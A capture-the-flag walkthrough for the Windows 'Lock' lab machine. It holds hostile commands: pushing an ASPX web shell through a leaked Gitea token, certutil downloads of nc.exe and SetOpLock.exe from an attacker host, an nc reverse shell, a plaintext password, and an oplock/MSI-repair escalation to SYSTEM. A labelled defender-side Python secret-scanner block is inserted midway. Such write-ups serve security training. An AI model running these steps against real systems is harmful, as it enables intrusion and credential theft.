
Machine (Easy) - Lock

Writeup for the Lock machine, a Windows-based box involving exploitation of Gitea source control, web shell deployment, and abuse of a misconfigured MSI repair process to gain SYSTEM access.

Writeup Author: BobBuilder


Objective: Gain SYSTEM access via Gitea source control access and PDF24 misconfiguration

Category: Machine
Difficulty: Easy
Platform: Windows
Machine Author: xct & kozie


User

Step 1: Identify IIS Shortname Vulnerability

We scan the web server on port 80 for the IIS shortname disclosure vulnerability:

java -jar iis_shortname_scanner.jar 2 20 http://<lock_ip>

The scanner reports whether IIS leaks 8.3 short filenames, which can be used to discover hidden files and folders.

Step 2: Enumerate Gitea Server on Port 3000

We browse to the Gitea instance:

http://<lock_ip>:3000/ellen.freeman/dev-scripts/commit/dcc869b175a47ff2a2b8171cda55cb82dbddff3d

This commit reveals a valid Gitea API token.

Step 3: Use Gitea API to List Repositories

Using the API token, we list user repositories:

curl "http://<lock_ip>:3000/api/v1/user/repos?token=<API_TOKEN>"

We discover repositories including website.git.

Step 4: Clone the Repository and Upload a Web Shell

git clone http://<API_TOKEN>@<lock_ip>:3000/ellen.freeman/website.git

Add an ASPX web shell (shell.aspx) and push it:

git add shell.aspx
git config --global user.email "ellen.freeman"
git config --global user.name "ellen.freeman"
git commit -m "added shell"
git push

Step 5: Trigger the Web Shell

The deployed shell is accessible at:

http://<lock_ip>/shell.aspx

From the shell, we fetch nc.exe onto the target and spawn a reverse shell:

certutil.exe -urlcache -split -f http://<attacker_ip>/nc.exe C:\Gitea\nc.exe
C:\Gitea\nc.exe <attacker_ip> 4444 -e powershell

Step 6: Extract Credentials and Config Files

Check for stored Git credentials:

more .git-credentials
# http://ellen.freeman:<redacted>@localhost:3000

Search user documents:

more C:\Users\ellen.freeman\Documents\config.xml

Extracted credentials (decrypted from mRemoteNG config):

Username: Gale.Dekarios
Password: ty8wnW9qCKDosXo6
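Both credential leaks on this box (the Gitea token in a commit in Step 2 and the user:password URL in .git-credentials in Step 6) are the kind of thing a repository scan catches before an attacker does. The following is an added, defender-side example and not part of the original writeup: it walks git log -p output and flags a 40-hex Gitea-style access token and a URL with embedded credentials on added lines only. The log excerpt, token and password are constructed; only the commit id comes from the page.

```python
import re
from dataclasses import dataclass

# Constructed `git log -p` excerpt: token and password are made up,
# the commit id is the one the writeup points at.
SAMPLE_LOG = """\
commit dcc869b175a47ff2a2b8171cda55cb82dbddff3d
diff --git a/git-api.py b/git-api.py
+++ b/git-api.py
@@ -1,2 +1,3 @@
 import requests
+TOKEN = "0123456789abcdef0123456789abcdef01234567"
 BASE = "http://localhost:3000/api/v1"
diff --git a/.git-credentials b/.git-credentials
+++ b/.git-credentials
@@ -0,0 +1 @@
+http://ellen.freeman:n0t-the-real-one@localhost:3000
"""

# Gitea access tokens are 40 hex chars; `credential.helper store` writes
# URLs with user:password@ embedded into .git-credentials.
PATTERNS = {
    "gitea_token": re.compile(r"(?<![0-9a-fA-F])[0-9a-f]{40}(?![0-9a-fA-F])"),
    "url_credential": re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s/:@]+:[^\s@]+@"),
}

@dataclass
class Finding:
    commit: str
    path: str
    kind: str
    secret: str

def scan_git_log(log_text: str) -> list[Finding]:
    """Flag secrets on added (+) lines only; `commit <sha>` and `+++ b/path`
    headers give context and are never matched, so a commit id is not
    mistaken for a token."""
    findings: list[Finding] = []
    commit = path = ""
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[len("+++ b/"):]
        elif line.startswith("+"):
            for kind, pattern in PATTERNS.items():
                for m in pattern.finditer(line[1:]):
                    findings.append(Finding(commit, path, kind, m.group(0)))
    return findings
```

Feed it the output of git log -p --all to cover every branch, and print only a prefix of each secret so the report itself does not re-leak it.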

Root

Step 1: Abuse OpLock and MSI Repair Function

We download the binary:

cd C:\Gitea\
certutil.exe -urlcache -split -f http://<attacker_ip>/SetOpLock.exe SetOpLock.exe

We set an oplock on the log file that the repair writes, so the SYSTEM process blocks when it opens the file:

.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r

Trigger a repair of PDF24 software:

msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi

This starts a console window in the SYSTEM context; the oplock holds it open, and its Legacy Console Mode link is what opens the SYSTEM browser in the next step.

Step 2: Spawn SYSTEM Shell via Legacy Console Abuse

To get a SYSTEM shell:

  1. Right-click the top bar of the cmd window
  2. Click Properties
  3. Click the Legacy Console Mode link
  4. When the SYSTEM browser opens, press Ctrl+O
  5. Enter cmd.exe and press Enter

Step 3: Read Root Flag

more C:\Users\Administrator\Desktop\root.txt